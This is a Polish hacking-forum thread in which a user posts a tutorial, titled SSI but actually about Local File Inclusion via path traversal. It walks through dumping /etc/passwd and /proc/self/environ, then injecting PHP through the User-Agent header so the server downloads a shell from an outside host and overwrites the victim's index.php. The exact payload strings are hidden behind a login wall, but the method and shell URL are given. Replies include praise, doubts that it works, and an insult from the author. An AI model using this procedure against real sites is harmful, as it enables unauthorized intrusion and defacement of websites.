[Pytanie] Atak typu SSI (Server Side Inclusion)

[x0Ph]

1 – Wstep

 

W tym tutku pokaze wam jak wgrac plik do serwera bez autoryzacji za pomoca ataku LFI.

 

2 – Szukamy Local File Inlcusion

 

- Teraz musimy znalesc zagrozenie Local File Inclusion na stronie. Wiec znalezlismy nasz cel.

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

- Teraz zastapmy contact.php na ../ i url bedzie wygladac tak:

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

otrzymamy error

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

sa duze szanse na LocaL File Inclusion

 

- Teraz sprawdzmyetc/passwd zeby sprawdzic czy wystepuje blad Local File Inclusion . Zrobmy zapytanie :

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

otrzymamy error i brak pliku etc/passwd

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

wiec mamy wiecej sciezek dostepu

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

dolaczylismy plik etc/passwd

 

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

 

3 – Sprawdzanie proc/self/environ

 

- Sprawdzmy czy proc/self/environ jest dostepne. Usun etc/passwd with proc/self/environ

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

Otrzymamy:

 

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x [email protected] SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

 

proc/self/environ jest dostepne. Jesli masz pusta strone lub blad proc/self/environ ijest niedostepne lub OS to FreeBSD.

 

4 – Wstrzykiwanie kodu

 

- Wstrzyknijmy nasz kod do proc/self/environ.Jak to zrobimy?Mozemy wstrzyknac nasz kod przez User-Agent HTTP Header.

Uzyj Tamper Data Addon dla Firefox zeby zmienic User-Agent.Wlacz Tamper Data w Firefox i uzyj tej strony :

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

Wybierz Tamper i w User-Agent napisz to :

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

http://hack-bay.com/Shells/gny.txt - to nasz strona ktora bedzie zapisana na stronie ofiary jako index.php

 

Wyslij zapytanie.

 

Nasza komenda zostanie wywolana (pobierze plik txt z http://hack-bay.com/Shells/gny.txt i zapisze jako index.php na

stronie) przez system(), i nasz index.php zostanie stworzony .Jesli nie dziala,sproboj exec() poniewaz system() moze byc zablokowany w php.ini.

 

5 – Otwieramy nasza strone

 

- Spradzmy czy strona zostala prawidlowo zapisana

 

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

 

Nasz index jest tutaj. Wstrzykniecie sie powiodło.

 

Rezultat: zastapilismy index.php naszym wlasnym indexem bez hackowania ftp.

 

[wjatek]

Jak dobrze, że na MPC zakazane jest tylko piractwo a nie hakerstwo ^_^

[KDKJ]

Ładnie opisane, ale mi na żadnej stronie to nie działa a szkoda

 

+ 4u

[Gaw3l]

Generalnie jest taka zasada, że podajemy autora, jeżeli wykorzystujemy cudzą pracę.

/btw. hack-bay.com nie istnieje (wygląda na to, że już od dawna)

 

---

 

Ładnie opisane, ale mi na żadnej stronie to nie działa a szkoda

 

Dzięki Bogu, mniej script-kiddies będzie.

[her0es]

wof, wymiatasz

zgubiłem sie przy errorach ;p ale tutek jest dobry

oczywiście +

[Edgarek]

Jak dobrze, że na MPC zakazane jest tylko piractwo a nie hakerstwo ^_^

Według Ciebie nazwa forum nie powinna kojarzyć się jego zawartości ?

Temat: Przydatne, pjona.

Edytowane 5 Września 2011 przez Edgarek

[mromgwtf16]

LOL, po pierwsze, rzadko to działa, po drugie, to nie server side inclusion tylko directory traversal, po trzecie SSI wygląda tak, np.:

To jest ukryta treść, proszę

• Zaloguj się
• lub
• Zarejestruj się

[x0Ph]

@UP

Wes wypierdalaj. Nie dziwie sie ze na wszystkie konta dostajesz bany...

[Heniut]

Szkoda, że nie działa za 97% stron, ale fajne +